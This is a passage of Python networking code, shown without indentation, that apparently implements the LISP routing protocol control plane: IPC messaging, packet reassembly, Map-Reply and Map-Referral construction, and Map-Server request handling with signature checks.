def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find(b"control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
if (type(segment) == str): segment = segment.encode()
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error as e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump. Returns string
# and not byte string like supplied "packet" type.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = b""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + b" "
offset += 8
length -= 4
#endfor
return(new.decode())
#enddef
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# Send on socket.
#
try:
lisp_socket.sendto(packet, (address, port))
except socket.error as e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
return
#enddef
#
# lisp_receive_segments
#
# Process 1500 byte segments if received IPC packet greater than what sockets
# can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length. We only have one
# segment which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
seg = segment.decode()
if (seg.find("packet@") == 0):
seg = seg.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look at array elements with index 2 and above. Caller
# passes a byte string.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = b""
for segment in payload: packet += segment + b"\x40"
return(packet[:-1])
#enddef
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did it so it is assebled into a complete datagram
# in this sytem.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
if (type(data) == str): data = data.encode()
loop = False
while (assembled == False):
data = data.split(b"@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0].decode()
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2].decode()
port = data[3].decode()
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we will confuse the IPC separator from real data.
# So go to the payload and put in 0x40 where split() seperated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(b" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command.decode() + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
timestamp = time.time()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl, timestamp)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
elif (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
elif (lisp_is_running("lisp-itr")):
lisp_process_unicast_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl, timestamp):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, map_request,
keys, enc, auth, mr_ttl=-1):
rloc_probe = map_request.rloc_probe if (map_request != None) else False
json_telemetry = map_request.json_telemetry if (map_request != None) else \
None
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
if (json_telemetry != None): eid_record.rloc_count += 1
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
probing_rloc = None
for rloc_entry in rloc_set:
multicast = rloc_entry.rloc.is_multicast_address()
rloc_record = lisp_rloc_record()
probe_bit = rloc_probe and (multicast or json_telemetry == None)
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs or multicast):
rloc_record.local_bit = True
rloc_record.probe_bit = probe_bit
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
if (probing_rloc == None): probing_rloc = rloc_entry.rloc
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
#
# Add etr-out-ts if telemetry data was present in Map-Request.
#
if (json_telemetry != None):
rloc_record = lisp_rloc_record()
if (probing_rloc): rloc_record.rloc.copy_address(probing_rloc)
rloc_record.local_bit = True
rloc_record.probe_bit = True
rloc_record.reach_bit = True
if (lisp_i_am_rtr):
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
#endif
js = lisp_encode_telemetry(json_telemetry, eo=str(time.time()))
rloc_record.json = lisp_json("telemetry", js)
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endif
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp when building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if (public and rtr in lisp_rtr_list or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl, etr_in_ts):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
#
# If we found telemetry data in the Map-Request, add the input timestamp
# now and add output timestamp in building the Map-Reply.
#
jt = map_request.json_telemetry
if (jt != None):
map_request.json_telemetry = lisp_encode_telemetry(jt, ei=etr_in_ts)
#endif
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, map_request, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endif
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Chcek the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
# This can also be true for IPv6 RLOCs. So include them.
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_ipv6()): rloc_set.append(rloc_entry)
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify messate to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return(pubsub)
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription request is being requested, return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, rloc_records,
registered_eid, site):
for peid in lisp_pubsub_cache:
for pubsub in list(lisp_pubsub_cache[peid].values()):
e = pubsub.eid_prefix
if (e.is_more_specific(registered_eid) == False): continue
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(peid, False), nonce))
#
# Do not use memory from EID-record of Map-Register since we are
# over-writing EID for Map-Notify message.
#
pubsub_record = copy.deepcopy(eid_record)
pubsub_record.eid.copy_address(e)
pubsub_record = pubsub_record.encode() + rloc_records
lisp_build_map_notify(lisp_sockets, pubsub_record, [peid], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
pubsub = lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl,
xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
pubsub.map_notify_count += 1
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usaully
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If we are requesting for non Crypto-EIDs and signatures are configured
# to be requred and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and site_eid.policy in lisp_policies):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
